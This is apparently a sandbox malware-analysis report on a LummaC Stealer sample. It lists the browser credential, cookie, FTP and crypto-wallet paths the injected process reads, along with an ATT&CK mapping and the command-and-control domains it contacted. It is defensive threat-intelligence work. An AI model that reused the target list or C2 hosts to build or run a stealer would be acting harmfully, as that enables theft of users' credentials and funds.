                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1831814063.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1832206097.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1831883195.0000000002A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 4820, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 4820, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		311
                Process Injection                		1
                Masquerading                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Screen Capture                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory231
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)231
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares41
                Data from Local System                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                Process Injection                		NTDS231
                Virtualization/Sandbox Evasion                		Distributed Component Object Model2
                Clipboard Data                		114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets11
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials33
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ForcesLangi.exe53%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                ForcesLangi.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com:443/apipi100%Avira URL Cloudmalware
                https://lev-tolstoi.com/?#100%Avira URL Cloudmalware
                https://prisonyfork.buzz:443/api100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apiA100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apiQ0O0q100%Avira URL Cloudmalware
                https://lev-tolstoi.com/api_q100%Avira URL Cloudmalware
                https://lev-tolstoi.com:443/apiB100%Avira URL Cloudmalware
                https://appliacnesot.buzz:443/api100%Avira URL Cloudmalware
                https://lev-tolstoi.com/apil100%Avira URL Cloudmalware
                https://lev-tolstoi.com:443/apiZ100%Avira URL Cloudmalware
                ingreem-eilish.biz0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		92.122.104.90
                		truefalse
                  		high
                  lev-tolstoi.com
                  		104.21.66.86
                  		truefalse
                    		high
                    cashfuzysao.buzz
                    		unknown
                    		unknowntrue
                      		unknown
                      scentniej.buzz
                      		unknown
                      		unknowntrue
                        		unknown
                        inherineau.buzz
                        		unknown
                        		unknowntrue
                          		unknown
                          prisonyfork.buzz
                          		unknown
                          		unknowntrue
                            		unknown
                            ingreem-eilish.biz
                            		unknown
                            		unknowntrue
                              		unknown
                              rebuildeso.buzz
                              		unknown
                              		unknowntrue
                                		unknown
                                appliacnesot.buzz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  hummskitnj.buzz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    screwamusresz.buzz
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      scentniej.buzzfalse
                                        		high
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          		high
                                          rebuildeso.buzzfalse
                                            		high
                                            appliacnesot.buzzfalse
                                              		high
                                              screwamusresz.buzzfalse
                                                		high
                                                cashfuzysao.buzzfalse
                                                  		high
                                                  inherineau.buzzfalse
                                                    		high
                                                    https://lev-tolstoi.com/apifalse
                                                      		high
                                                      hummskitnj.buzzfalse
                                                        		high
                                                        prisonyfork.buzzfalse
                                                          		high
                                                          ingreem-eilish.biztrue
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://steamcommunity.com/?subsection=broadcastsaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lev-tolstoi.com/aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://steamcommunity.com:443/profiles/76561199724331900aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://steamcommunity.com/haspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
